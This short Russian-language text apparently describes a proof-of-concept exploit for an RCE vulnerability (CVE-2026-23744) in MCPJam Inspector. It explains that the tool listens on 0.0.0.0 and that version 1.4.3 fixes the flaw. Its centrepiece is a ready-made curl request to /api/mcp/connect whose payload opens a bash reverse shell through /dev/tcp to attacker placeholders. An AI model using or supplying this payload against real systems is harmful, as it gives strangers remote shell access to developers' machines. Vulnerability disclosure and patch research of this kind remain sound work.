
Эксплойт PoC для CVE-2026-23744, уязвимости удалённого выполнения кода в MCPJam Inspector. Демонстрирует RCE через специально сформированный HTTP-запрос к конечной точке /api/mcp/connect с полезной нагрузкой reverse shell.
PoC об уязвимости в MCP Server.
автоматизировано для части POST-запроса с правильным телом.
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector — это первая локальная платформа разработки для MCP-серверов. Версии 1.4.2 и более ранние уязвимы к удалённому выполнению кода (RCE), что позволяет атакующему отправить специально сформированный HTTP-запрос, который запускает установку MCP-сервера и приводит к RCE. Поскольку MCPJam Inspector по умолчанию прослушивает адрес 0.0.0.0 вместо 127.0.0.1, атакующий может удалённо вызвать RCE с помощью простого HTTP-запроса. Версия 1.4.3 содержит исправление.